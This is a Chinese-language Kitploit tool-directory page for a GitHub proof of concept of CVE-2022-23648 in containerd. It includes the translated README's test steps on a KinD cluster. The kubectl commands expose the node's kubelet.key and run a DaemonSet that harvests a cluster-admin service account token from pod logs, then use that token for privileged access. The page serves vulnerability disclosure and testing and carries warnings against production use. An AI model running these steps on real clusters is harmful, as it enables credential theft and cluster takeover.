Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/raesene/cve-2022-23648-poc
权限提升容器安全漏洞分析漏洞利用渗透测试云安全
GitHubraesene/cve-2022-23648-poc

CVE-2022-23648-POC

CVE-2022-23648 的 POC

查看仓库
361014年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-23648 的 PoC

这是 @_fel1x 发现的 CVE-2022-23648 的概念验证。披露信息见此处,CVE 信息见此处,还有一篇博客提供了更多信息和缓解建议,见此处。Containerfile 中包含了所需信息,你可以更改 VOLUME 的目标路径来尝试不同的路径。

展示其效果的最简单方式是使用 KinD,它带有可利用的镜像。

基本测试步骤

除非节点碰巧在 /var/lib/kubelet/pki 中存有大量数据,否则这应该是一个安全的测试。

  • kind create cluster --image=kindest/node:v1.21.1
  • kubectl create -f pod-manifest.yaml
  • kubectl exec poctest -- ls /var/lib/kubelet/pki/

如果你看到返回的文件中包含 kubelet.key,那就说明成功了 :)

尝试提权到 cluster-admin

注意:请勿在生产集群上尝试此操作。存在漏洞的 Containerd 可能会将大量数据复制到该攻击 Pod 中,从而耗尽磁盘空间。此外,这会将 cluster-admin 服务账户令牌打印到 Pod 日志中,而这些日志很可能会以明文形式发送到日志目的地。

这将运行一个 DaemonSet,尝试枚举节点上的所有 Kubernetes 服务账户令牌,如果发现是 cluster-admin 令牌,则将其打印到 Pod 日志中。

  • kubectl apply -f ds.yaml
  • kubectl --token="$(kubectl logs -l app=poctest | head -1)" auth can-i '*' '*' -A

如果输出为 yes,恭喜,你已经获得了一个短期有效的 cluster-admin 服务账户令牌,然后运行:

  • kubectl logs -l app=poctest | head -1 | awk -F\. '{print $2}' | base64 -d 来查看它是哪个服务账户

  • kubectl --token="$(kubectl logs -l app=poctest | head -1)" get pods -A

  • kubectl --token="$(kubectl logs -l app=poctest | head -1)" auth can-i --list

作者

  • Rory McCune @raesene

贡献者

  • @BradGeesaman - 提权 DaemonSet
下载工具